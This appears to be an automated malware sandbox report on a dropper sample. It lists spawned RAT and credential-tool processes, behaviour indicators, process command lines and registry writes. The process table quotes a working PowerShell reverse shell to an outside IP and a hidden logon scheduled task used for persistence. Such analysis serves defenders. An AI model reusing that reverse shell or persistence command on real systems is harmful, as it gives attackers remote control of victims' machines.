  - ExportTableTester.exe (PID: 13920)
  - av_downloader1.1.exe (PID: 13968)
  - Server1.exe (PID: 13864)
  - plantrojan.exe (PID: 14228)
  - pst.exe (PID: 1632)
  - Worldoffice.exe (PID: 14360)
  - av_downloader.exe (PID: 13936)
  - Terminal_9235.exe (PID: 14456)
  - Server.exe (PID: 14636)
  - njrat.exe (PID: 14628)
  - tretiy.exe (PID: 14472)
  - njrat.exe (PID: 14464)
  - njrat.exe (PID: 14480)
  - pornhub_downloader.exe (PID: 14644)
  - Server.exe (PID: 14616)
  - pornhub_downloader.exe (PID: 14936)
  - Krishna33.exe (PID: 14424)
  - Worldofficee.exe (PID: 14928)
  - client.exe (PID: 15112)
  - onetap.exe (PID: 14952)
  - pornhub_downloader.exe (PID: 14972)
  - winbox.exe (PID: 15128)
  - Host.exe (PID: 15104)
  - winbox.exe (PID: 15016)
  - Lab01-02.exe (PID: 14384)
  - connector1.exe (PID: 15428)
  - suker.exe (PID: 15496)
  - process-injection.exe (PID: 14964)
  - self-injection.exe (PID: 14984)
  - https.exe (PID: 16288)
  - SteamDetector.exe (PID: 16240)
  - webhook.exe (PID: 16332)
  - nfe.sfx.exe (PID: 16340)
  - zeropersca.exe (PID: 16364)
  - s.exe (PID: 16248)
  - boleto.exe (PID: 15368)
  - prueba.exe (PID: 16280)
  - quasarat.exe (PID: 16264)
  - aaa%20(3).exe (PID: 16312)
  - ipscan.exe (PID: 16296)
  - Network.exe (PID: 15376)
  - Installer.exe (PID: 14288)
  - Anap.a.exe (PID: 16320)
  - discord.exe (PID: 13896)
  - 1223.exe (PID: 15404)
  - TestExe.exe (PID: 15412)
  - PCclear_Eng_mini.exe (PID: 14516)
  - CrazyCoach.exe (PID: 14536)
  - Axam.a.exe (PID: 13948)
  - Te.exe (PID: 17012)
  - your_app.exe (PID: 17320)
  - donut.exe (PID: 16304)
  - donut.exe (PID: 16232)
  - VB.NET%20CRYPTER%20V2.exe (PID: 16744)
  - hack.exe (PID: 16272)
  - server.exe (PID: 17200)
  - Neverlose%20Loader.exe (PID: 17500)
  - witheFile.exe (PID: 16552)
  - freffercerere.exe (PID: 17732)
  - Bloxflip Predictor.exe (PID: 17688)
  - conhost.exe (PID: 17760)
  - mimikatz.exe (PID: 17616)
  - intro.avi.exe (PID: 12616)
  - aaa%20(3).exe (PID: 13356)
  - server.exe (PID: 1324)
  - nfe.sfx.exe (PID: 6004)
  - rundll32.exe (PID: 14668)
  - Client-built.exe (PID: 10108)
  - new.exe (PID: 4192)
  - Java32.exe (PID: 18404)
  - SWID_reader.exe (PID: 19132)
  - Client-built.exe (PID: 18572)
  - SteamDetector.exe (PID: 19372)
  - srtware.exe (PID: 18508)
  - Axam.exe (PID: 19248)
  - Axam.exe (PID: 20016)
  - NOTallowedtocrypt.exe (PID: 20028)
  - Axam.exe (PID: 20064)
  - Axam.exe (PID: 20072)
  - Axam.exe (PID: 19492)
  - justpoc.exe (PID: 20340)
  - toolwin.exe (PID: 20320)
  - Axam.exe (PID: 20232)
- Reads the computer name
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
  - VZXCHH66.exe (PID: 8000)
  - RegAsm.exe (PID: 9044)
  - QpKuKKY.exe (PID: 9300)
  - JcQiZ5o.exe (PID: 7608)
  - nudwee.exe (PID: 10284)
  - ddosziller.exe (PID: 10528)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - elf.exe (PID: 11044)
  - AsyncClient.exe (PID: 10548)
  - XClient.exe (PID: 11788)
  - sys.exe (PID: 11768)
  - sup.exe (PID: 12668)
  - TEST.exe (PID: 12632)
  - VOLATUS0.5.exe (PID: 12648)
  - vtoroy.exe (PID: 13012)
  - DumpAADUserPRT.exe (PID: 9340)
  - evetbeta.exe (PID: 12092)
  - System32.exe (PID: 12520)
  - 1UCzP6D.exe (PID: 12612)
  - Doppelganger.exe (PID: 11964)
  - imagelogger.exe (PID: 13524)
  - svchost.exe (PID: 13912)
  - kg.exe (PID: 11732)
  - keygen.exe (PID: 13508)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - perviy.exe (PID: 13944)
  - Fast%20Download.exe (PID: 13904)
  - random.exe (PID: 13888)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - av_downloader1.1.exe (PID: 13968)
  - Vikings.exe (PID: 13492)
  - Bloxflip%20Predictor.exe (PID: 14124)
  - SearchUII.exe (PID: 14316)
  - ExportTableTester.exe (PID: 13920)
  - Terminal_9235.exe (PID: 14456)
  - Server1.exe (PID: 13864)
  - tretiy.exe (PID: 14472)
  - pst.exe (PID: 1632)
  - Host.exe (PID: 15104)
  - onetap.exe (PID: 14952)
  - Krishna33.exe (PID: 14424)
  - pornhub_downloader.exe (PID: 14644)
  - pornhub_downloader.exe (PID: 14972)
  - Lab01-02.exe (PID: 14384)
  - pornhub_downloader.exe (PID: 14936)
  - client.exe (PID: 15112)
  - winbox.exe (PID: 15016)
  - suker.exe (PID: 15496)
  - winbox.exe (PID: 15128)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - 444.exe (PID: 14100)
  - 444.exe (PID: 14108)
  - self-injection.exe (PID: 14984)
  - njrat.exe (PID: 14628)
  - boleto.exe (PID: 15368)
  - s.exe (PID: 16248)
  - https.exe (PID: 16288)
  - quasarat.exe (PID: 16264)
  - nfe.sfx.exe (PID: 16340)
  - Server.exe (PID: 14636)
  - njrat.exe (PID: 14480)
  - aaa%20(3).exe (PID: 16312)
  - ipscan.exe (PID: 16296)
  - discord.exe (PID: 13896)
  - TestExe.exe (PID: 15412)
  - Network.exe (PID: 15376)
  - Installer.exe (PID: 14288)
  - njrat.exe (PID: 14464)
  - Server.exe (PID: 14616)
  - PCclear_Eng_mini.exe (PID: 14516)
  - VB.NET%20CRYPTER%20V2.exe (PID: 16744)
  - Neverlose%20Loader.exe (PID: 17500)
  - freffercerere.exe (PID: 17732)
  - Anap.a.exe (PID: 16320)
  - Bloxflip Predictor.exe (PID: 17688)
  - SteamDetector.exe (PID: 16240)
  - intro.avi.exe (PID: 12616)
  - Axam.a.exe (PID: 13948)
  - aaa%20(3).exe (PID: 13356)
  - your_app.exe (PID: 17320)
  - nfe.sfx.exe (PID: 6004)
  - new.exe (PID: 4192)
  - Client-built.exe (PID: 10108)
  - conhost.exe (PID: 17760)
  - Java32.exe (PID: 18404)
  - rundll32.exe (PID: 14668)
  - Client-built.exe (PID: 18572)
  - srtware.exe (PID: 18508)
  - SWID_reader.exe (PID: 19132)
  - NOTallowedtocrypt.exe (PID: 20028)
  - SteamDetector.exe (PID: 19372)
  - justpoc.exe (PID: 20340)
  - CrazyCoach.exe (PID: 14536)
  - toolwin.exe (PID: 20320)
  - server.exe (PID: 17200)
  - Axam.exe (PID: 19248)
  - Axam.exe (PID: 20064)
  - Axam.exe (PID: 20072)
  - Axam.exe (PID: 20016)
- Create files in a temporary directory
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
  - QpKuKKY.exe (PID: 9300)
  - av_downloader1.1.exe (PID: 13968)
  - av_downloader.exe (PID: 13936)
  - pst.exe (PID: 1632)
  - random.exe (PID: 13888)
  - Server1.exe (PID: 13864)
  - pornhub_downloader.exe (PID: 14644)
  - pornhub_downloader.exe (PID: 14936)
  - pornhub_downloader.exe (PID: 14972)
  - TEST.exe (PID: 12632)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - webhook.exe (PID: 16332)
  - Axam.a.exe (PID: 13948)
  - suker.exe (PID: 15496)
  - imagelogger.exe (PID: 13524)
  - Axam.exe (PID: 19248)
  - Axam.exe (PID: 20016)
  - Axam.exe (PID: 20064)
  - Axam.exe (PID: 20072)
  - Axam.exe (PID: 19492)
  - srtware.exe (PID: 18508)
  - Axam.exe (PID: 20232)
  - quasarat.exe (PID: 16264)
- The sample compiled with english language support
  - main.exe (PID: 3924)
  - main.exe (PID: 2780)
  - Axam.a.exe (PID: 13948)
  - suker.exe (PID: 15496)
- Reads security settings of Internet Explorer
  - Taskmgr.exe (PID: 6240)
- Creates files or folders in the user directory
  - Taskmgr.exe (PID: 6240)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Server1.exe (PID: 13864)
  - explorer.exe (PID: 4772)
  - 444.exe (PID: 14108)
  - Network.exe (PID: 15376)
  - Host.exe (PID: 15104)
  - SteamDetector.exe (PID: 16240)
  - Axam.a.exe (PID: 13948)
  - suker.exe (PID: 15496)
  - conhost.exe (PID: 17760)
  - new.exe (PID: 4192)
  - Java32.exe (PID: 18404)
  - imagelogger.exe (PID: 13524)
  - NOTallowedtocrypt.exe (PID: 20028)
  - SteamDetector.exe (PID: 19372)
  - server.exe (PID: 1324)
- Checks proxy server information
  - main.exe (PID: 2780)
  - nudwee.exe (PID: 10284)
  - TEST.exe (PID: 12632)
  - client.exe (PID: 15112)
  - onetap.exe (PID: 14952)
  - https.exe (PID: 16288)
  - Host.exe (PID: 15104)
  - suker.exe (PID: 15496)
  - nfe.sfx.exe (PID: 16340)
  - PCclear_Eng_mini.exe (PID: 14516)
  - powershell.exe (PID: 10208)
  - svchost.exe (PID: 13912)
  - imagelogger.exe (PID: 13524)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - powershell.exe (PID: 10080)
  - nfe.sfx.exe (PID: 6004)
  - quasarat.exe (PID: 16264)
  - powershell.exe (PID: 13928)
  - justpoc.exe (PID: 20340)
- Reads the machine GUID from the registry
  - JcQiZ5o.exe (PID: 7608)
  - VZXCHH66.exe (PID: 8000)
  - RegAsm.exe (PID: 9044)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - TEST.exe (PID: 12632)
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - ddosziller.exe (PID: 10528)
  - svchost.exe (PID: 13912)
  - 1UCzP6D.exe (PID: 12612)
  - AsyncClient.exe (PID: 10548)
  - imagelogger.exe (PID: 13524)
  - onetap.exe (PID: 14952)
  - client.exe (PID: 15112)
  - Host.exe (PID: 15104)
  - Terminal_9235.exe (PID: 14456)
  - Krishna33.exe (PID: 14424)
  - System32.exe (PID: 12520)
  - s.exe (PID: 16248)
  - quasarat.exe (PID: 16264)
  - boleto.exe (PID: 15368)
  - Installer.exe (PID: 14288)
  - TestExe.exe (PID: 15412)
  - Network.exe (PID: 15376)
  - aaa%20(3).exe (PID: 16312)
  - VB.NET%20CRYPTER%20V2.exe (PID: 16744)
  - discord.exe (PID: 13896)
  - Neverlose%20Loader.exe (PID: 17500)
  - Server1.exe (PID: 13864)
  - intro.avi.exe (PID: 12616)
  - freffercerere.exe (PID: 17732)
  - Client-built.exe (PID: 10108)
  - new.exe (PID: 4192)
  - aaa%20(3).exe (PID: 13356)
  - Java32.exe (PID: 18404)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - Client-built.exe (PID: 18572)
  - SWID_reader.exe (PID: 19132)
  - server.exe (PID: 17200)
  - SteamDetector.exe (PID: 19372)
  - toolwin.exe (PID: 20320)
- Process checks computer location settings
  - QpKuKKY.exe (PID: 9300)
  - av_downloader1.1.exe (PID: 13968)
  - random.exe (PID: 13888)
  - pornhub_downloader.exe (PID: 14644)
  - pornhub_downloader.exe (PID: 14936)
  - pornhub_downloader.exe (PID: 14972)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 12592)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - njrat.exe (PID: 14464)
  - 444.exe (PID: 14108)
  - Server.exe (PID: 14616)
  - SteamDetector.exe (PID: 16240)
  - suker.exe (PID: 15496)
  - new.exe (PID: 4192)
  - svchost.exe (PID: 13912)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - NOTallowedtocrypt.exe (PID: 20028)
- Reads Internet Explorer settings
  - mshta.exe (PID: 10180)
  - mshta.exe (PID: 11532)
  - mshta.exe (PID: 11752)
  - mshta.exe (PID: 11716)
  - mshta.exe (PID: 13024)
  - mshta.exe (PID: 12588)
  - mshta.exe (PID: 13500)
  - mshta.exe (PID: 14440)
  - mshta.exe (PID: 14416)
  - mshta.exe (PID: 14944)
  - mshta.exe (PID: 18440)
  - mshta.exe (PID: 19364)
- Reads Environment values
  - TEST.exe (PID: 12632)
  - client.exe (PID: 15112)
  - 1UCzP6D.exe (PID: 12612)
  - Network.exe (PID: 15376)
  - Neverlose%20Loader.exe (PID: 17500)
  - Java32.exe (PID: 18404)
  - imagelogger.exe (PID: 13524)
  - svchost.exe (PID: 13912)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
- Creates files in the program directory
  - Nan_Brout_ncrypt.exe (PID: 12364)
- Process checks whether UAC notifications are on
  - Nan_Brout_ncrypt.exe (PID: 12364)
- Launching a file from a Registry key
  - Nan_Brout_ncrypt.exe (PID: 12364)
  - webhook.exe (PID: 16332)
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - rundll32.exe (PID: 14668)
  - NOTallowedtocrypt.exe (PID: 20028)
  - server.exe (PID: 17200)
  - SteamDetector.exe (PID: 19372)
  - Axam.exe (PID: 19248)
  - quasarat.exe (PID: 16264)
  - Axam.exe (PID: 20064)
  - server.exe (PID: 1324)
  - Axam.exe (PID: 20072)
  - Axam.exe (PID: 20016)
- Disables trace logs
  - TEST.exe (PID: 12632)
  - client.exe (PID: 15112)
  - powershell.exe (PID: 10208)
  - imagelogger.exe (PID: 13524)
  - svchost.exe (PID: 13912)
  - NJRAT%20DANGEROUS.exe (PID: 9796)
  - XClient.exe (PID: 11788)
  - powershell.exe (PID: 10080)
  - quasarat.exe (PID: 16264)
  - powershell.exe (PID: 13928)
- Launching a file from the Startup directory
  - Bloxflip%20Predictor.exe (PID: 14232)
  - Axam.a.exe (PID: 13948)
  - conhost.exe (PID: 17760)
  - imagelogger.exe (PID: 13524)
  - SteamDetector.exe (PID: 19372)
  - server.exe (PID: 1324)
- The sample compiled with korean language support
  - main.exe (PID: 2780)
- PyInstaller has been detected (YARA)
  - main.exe (PID: 3924)
- Compiled with Borland Delphi (YARA)
  - conhost.exe (PID: 1164)
- Reads the software policy settings
  - TEST.exe (PID: 12632)
  - client.exe (PID: 15112)
- The sample compiled with russian language support
  - main.exe (PID: 2780)
- The sample compiled with polish language support
  - main.exe (PID: 2780)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 13036)
- Drops a (possible) Coronavirus decoy
  - main.exe (PID: 2780)
- The sample compiled with chinese language support
  - main.exe (PID: 2780)
- The executable file from the user directory is run by the Powershell process
  - Axam.exe (PID: 20232)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 13928)
  - powershell.exe (PID: 16104)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (87.3)
.exe	\|	Generic Win/DOS Executable (6.3)
.exe	\|	DOS Executable Generic (6.3)

EXIF

EXE

MachineType:	AMD AMD64
TimeStamp:	2025:06:19 18:59:12+00:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32+
LinkerVersion:	14.43
CodeSize:	178688
InitializedDataSize:	154624
UninitializedDataSize:	-
EntryPoint:	0xc380
OSVersion:	6
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows command line

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

417

Monitored processes

290

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

188

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

netsh.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

1164

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

main.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

1324

"C:\Users\admin\server.exe"

C:\Users\admin\server.exe

Server.exe

User:

admin

Integrity Level:

HIGH

Modules

Images
c:\users\admin\server.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll

1632

pst.exe

C:\Users\admin\AppData\Local\Temp\a\pst.exe

—

main.exe

User:

admin

Company:

Oleg N. Scherbakov

Integrity Level:

HIGH

Description:

7z Setup SFX (x86)

Version:

1.7.0.3873

Modules

Images
c:\users\admin\appdata\local\temp\a\pst.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll

2072

C:\WINDOWS\system32\cmd.exe /c "schtasks /Create /TN crypto_nuke_task /TR \"C:\Users\admin\AppData\Local\Temp\main.exe\" /SC ONLOGON /RL HIGHEST /F"

C:\Windows\System32\cmd.exe

main.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll

2200

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

2704

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Command " = New-Object System.Net.Sockets.TCPClient('37.97.253.201',4432); = .GetStream(); [byte[]] = 0..65535|%{0}; while(( = .Read(, 0, .Length)) -ne 0){; = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex 2>&1 | Out-String ); = + 'PS ' + (pwd).Path + '> '; = ([text.encoding]::ASCII).GetBytes(); .Write(,0,.Length); .Flush()}; .Close()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2780

"C:\Users\admin\AppData\Local\Temp\main.exe"

C:\Users\admin\AppData\Local\Temp\main.exe

main.exe

User:

admin

Integrity Level:

HIGH

Modules

Images
c:\users\admin\appdata\local\temp\main.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll

3288

cmd.exe /C start c:\Windows\System32\Taskmgr.exe

C:\Windows\System32\cmd.exe

—

main.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll

3720

"C:\Users\admin\AppData\Local\Temp\main.exe"

C:\Users\admin\AppData\Local\Temp\main.exe

—

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

3221226540

Modules

Images
c:\users\admin\appdata\local\temp\main.exe
c:\windows\system32\ntdll.dll

Add for printing

Total events

165 852

Read events

165 544

Write events

299

Delete events

Modification events


(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702BE
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060374
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(6240) Taskmgr.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:	delete value	Name:	Preferences
Value:
(PID) Process:	(6240) Taskmgr.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:	write	Name:	Preferences
Value: 0D00000060000000600000006800000068000000E3010000DC010000000001000000008000000080D8010080DF010080000100016B00000034000000130300008C020000E80300000000000000000000000000000F000000010000000000000058AAEE82F77F00000000000000000000000000002E0100001E0000008990000000000000FF00000001015002000000000D0000000000000098AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008B900000010000000000000000101001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF780000001E0000008C900000020000000000000001021200000000000400000000000000C8AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008D900000030000000000000000011001000000000200000000000000E8AAEE82F77F00000000000000000000FFFFFFFF320000001E0000008A90000004000000000000000008200100000000050000000000000000ABEE82F77F00000000000000000000FFFFFFFFC80000001E0000008E90000005000000000000000001100100000000060000000000000028ABEE82F77F00000000000000000000FFFFFFFF040100001E0000008F90000006000000000000000001100100000000070000000000000050ABEE82F77F00000000000000000000FFFFFFFF49000000490000009090000007000000000000000004250000000000080000000000000080AAEE82F77F00000000000000000000FFFFFFFF49000000490000009190000008000000000000000004250000000000090000000000000070ABEE82F77F00000000000000000000FFFFFFFF490000004900000092900000090000000000000000042508000000000A0000000000000088ABEE82F77F00000000000000000000FFFFFFFF4900000049000000939000000A0000000000000000042508000000000B00000000000000A8ABEE82F77F00000000000000000000FFFFFFFF490000004900000039A000000B0000000000000000042509000000001C00000000000000C8ABEE82F77F00000000000000000000FFFFFFFFC8000000490000003AA000000C0000000000000000011009000000001D00000000000000F0ABEE82F77F00000000000000000000FFFFFFFF64000000490000004CA000000D0000000000000000021508000000001E0000000000000010ACEE82F77F00000000000000000000FFFFFFFF64000000490000004DA000000E000000000000000002150800000000030000000A000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000008990000000000000FF00000001015002000000000400000000000000C8AAEE82F77F0000000000000000000001000000960000001E0000008D900000010000000000000001011000000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C900000020000000000000000021000000000000C0000000000000040ACEE82F77F0000000000000000000003000000640000001E00000094900000030000000000000001021000000000000D0000000000000068ACEE82F77F00000000000000000000FFFFFFFF640000001E00000095900000040000000000000000011001000000000E0000000000000090ACEE82F77F0000000000000000000005000000320000001E00000096900000050000000000000001042001000000000F00000000000000B8ACEE82F77F0000000000000000000006000000320000001E00000097900000060000000000000001042001000000001000000000000000D8ACEE82F77F0000000000000000000007000000460000001E00000098900000070000000000000001011001000000001100000000000000F8ACEE82F77F00000000000000000000FFFFFFFF640000001E0000009990000008000000000000000001100100000000060000000000000028ABEE82F77F0000000000000000000009000000040100001E0000008F9000000900000000000000010110010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000B000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000009E90000000000000FF0000000101500200000000120000000000000020ADEE82F77F00000000000000000000FFFFFFFF2D0000001E0000009B90000001000000000000000004200100000000140000000000000040ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009D90000002000000000000000001100100000000130000000000000068ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009C900000030000000000000000011001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C90000004000000000000000102100000000000070000000000000050ABEE82F77F000000000000000000000500000049000000490000009090000005000000000000000104210000000000080000000000000080AAEE82F77F000000000000000000000600000049000000490000009190000006000000000000000104210000000000090000000000000070ABEE82F77F0000000000000000000007000000490000004900000092900000070000000000000001042108000000000A0000000000000088ABEE82F77F0000000000000000000008000000490000004900000093900000080000000000000001042108000000000B00000000000000A8ABEE82F77F0000000000000000000009000000490000004900000039A00000090000000000000001042109000000001C00000000000000C8ABEE82F77F000000000000000000000A00000064000000490000003AA000000A00000000000000000110090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000008000000010000000000000058AAEE82F77F0000000000000000000000000000C60000001E000000B090000000000000FF0000000101500200000000150000000000000088ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B1900000010000000000000000042500000000001600000000000000B8ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B2900000020000000000000000042500000000001800000000000000E0ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B490000003000000000000000004250000000000170000000000000008AEEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B390000004000000000000000004250000000000190000000000000040AEEE82F77F00000000000000000000FFFFFFFFA00000001E000000B5900000050000000000000000042001000000001A0000000000000070AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B6900000060000000000000000042001000000001B00000000000000A0AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B790000007000000000000000004200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA00000000000000000000000000000000000000000000009D200000200000009100000064000000320000006400000050000000320000003200000028000000500000003C0000005000000050000000320000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C00000050000000500000009700000032000000780000003200000050000000500000005000000050000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA000000000000000000000000000000000000009D200000200000009100000064000000320000009700000050000000320000003200000028000000500000003C00000050000000500000003200000050000000500000005000000050000000500000005000000050000000280000005000000023000000230000002300000023000